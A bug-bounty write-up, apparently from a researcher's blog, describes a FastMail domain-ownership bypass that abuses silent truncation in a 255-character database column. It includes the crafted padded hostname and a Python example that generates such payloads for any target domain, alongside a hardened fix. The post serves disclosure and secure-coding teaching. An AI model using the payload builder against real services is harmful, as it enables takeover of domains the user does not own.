FastMail.com Domain Ownership Bypass via Database Truncation

January 2 2018

Just a quick one: be wary of silent truncation in SQL databases.

In this case, I discovered that when adding email domains to FastMail, it was possible to bypass the ownership check for existing domains.

For example, if you only own id-rsa.pub, somebody else owns microsoft.com, and you try to add staff.microsoft.com, the ownership check fails because the eTLD+1 of that name is microsoft.com, which is not yours:

[Screenshot: FastMail ownership check]

However, if you know (or can guess!) that the database column is only 255 characters wide, you can submit a value in which the domain you actually want falls exactly on the truncation boundary:

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.xxxxxxxxxxxxxxxxxxx.microsoft.com.id-rsa.pub

It will pass the ownership check (because you own id-rsa.pub), but after truncation to 255 characters the value stored in the database has a completely different eTLD+1:

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.xxxxxxxxxxxxxxxxxxx.microsoft.com.

And the database driver did not even warn you about it. Whoops! The trailing dot is just the fully qualified form of the name; what matters is that the registered domain is now microsoft.com. Whether an over-long value is truncated or rejected depends on the engine and its configuration: MySQL, for example, only raises an error when STRICT_TRANS_TABLES or STRICT_ALL_TABLES is in sql_mode and otherwise truncates with a warning that most application code never reads, while PostgreSQL rejects a value that does not fit a varchar(n) column.

Lessons:

  • Enforce length limits on both the front-end and back-end.
  • Be sure your columns are at least as long as your length limits.
  • Run the ownership check on the canonical value that will actually be stored, not on the raw input, and configure the database (MySQL strict mode, for example) so that truncation is an error rather than a warning.
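As an added example (not FastMail's code, and not part of the original post), the following Python builds a payload of the shape shown above for an arbitrary victim domain and column width, then contrasts the flawed check-then-truncate flow with the hardened flow the lessons call for. The database is emulated by a function that truncates to the column width, since SQLite does not enforce VARCHAR lengths; the eTLD+1 logic simply takes the last two labels, a stand-in for a proper Public Suffix List lookup. All function names are assumptions of this example.

```python
"""
Added example (not FastMail's code): construct a hostname that passes an
eTLD+1 ownership check on the full string but, once truncated to a
VARCHAR(255) column, lands under a domain the attacker does not own.
The database is emulated because SQLite does not truncate; a MySQL table
in non-strict sql_mode behaves like emulated_store() below.
"""

MAX_LABEL = 63  # DNS label length limit (RFC 1035)


def registrable_domain(name: str) -> str:
    """Return the 'eTLD+1' of a hostname.

    Simplification for this example: the last two labels are treated as the
    registrable domain.  Production code should consult the Public Suffix
    List (e.g. the publicsuffix2 package) so that names like foo.co.uk work.
    """
    labels = name.lower().rstrip(".").split(".")
    if len(labels) < 2 or any(label == "" for label in labels):
        raise ValueError(f"not a valid hostname: {name!r}")
    return ".".join(labels[-2:])


def padding(length: int) -> str:
    """Build a dotted run of 'x' labels that is exactly `length` characters
    long, with no label longer than MAX_LABEL and no empty labels."""
    if length < 1:
        raise ValueError("padding must be at least one character")
    labels, remaining = [], length
    while remaining > 0:
        take = min(MAX_LABEL, remaining)
        if remaining - take == 1:  # never leave room for only a dot
            take -= 1
        labels.append("x" * take)
        remaining -= take
        if remaining > 0:
            remaining -= 1  # the dot that joins the next label
    return ".".join(labels)


def build_payload(victim: str, owned: str, column_len: int = 255) -> str:
    """Construct <padding>.<victim>.<owned> so that the first `column_len`
    characters end in '<victim>.' (the shape used in the post above)."""
    prefix_len = column_len - len(victim) - 2  # room for '.' + victim + '.'
    prefix = f"{padding(prefix_len)}.{victim}."
    assert len(prefix) == column_len
    return prefix + owned


def emulated_store(value: str, column_len: int = 255) -> str:
    """Emulates a VARCHAR(column_len) column in a database that silently
    truncates (MySQL without STRICT_TRANS_TABLES); returns what is persisted."""
    return value[:column_len]


def vulnerable_add_domain(owned_by_user: set, requested: str,
                          column_len: int = 255) -> str:
    """Flawed flow: check ownership of the submitted string, then store
    whatever the column happens to keep."""
    if registrable_domain(requested) not in owned_by_user:
        raise PermissionError(f"you do not own {registrable_domain(requested)}")
    return emulated_store(requested, column_len)


def hardened_add_domain(owned_by_user: set, requested: str,
                        column_len: int = 255) -> str:
    """Fixed flow: enforce the column's length limit before the check and
    run the check on the canonical value that will actually be stored."""
    canonical = requested.lower().rstrip(".")
    if len(canonical) > column_len:
        raise ValueError(f"domain longer than {column_len} characters")
    stored = emulated_store(canonical, column_len)
    if stored != canonical:  # belt and braces: the DB must not alter it
        raise RuntimeError("database would alter the value; refusing to store")
    if registrable_domain(stored) not in owned_by_user:
        raise PermissionError(f"you do not own {registrable_domain(stored)}")
    return stored


if __name__ == "__main__":
    attacker_domains = {"id-rsa.pub"}  # constructed sample data
    payload = build_payload("microsoft.com", "id-rsa.pub")
    print(len(payload), "chars submitted; eTLD+1 of the submission:",
          registrable_domain(payload))
    stored = vulnerable_add_domain(attacker_domains, payload)
    print("stored as ...", stored[-30:], "-> eTLD+1", registrable_domain(stored))
    try:
        hardened_add_domain(attacker_domains, payload)
    except ValueError as exc:
        print("hardened flow rejected it:", exc)
```

Running it shows the 265-character submission evaluating to id-rsa.pub, the 255-character stored value evaluating to microsoft.com, and the hardened flow refusing the request before any ownership check runs. The same construction works for any column width: only the padding length changes.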

Bounty

I reported this issue to FastMail.com on 2018-01-01 and received a notification within 22 hours that the issue was fixed, along with a $100 USD bug bounty and a mention in the hall of fame.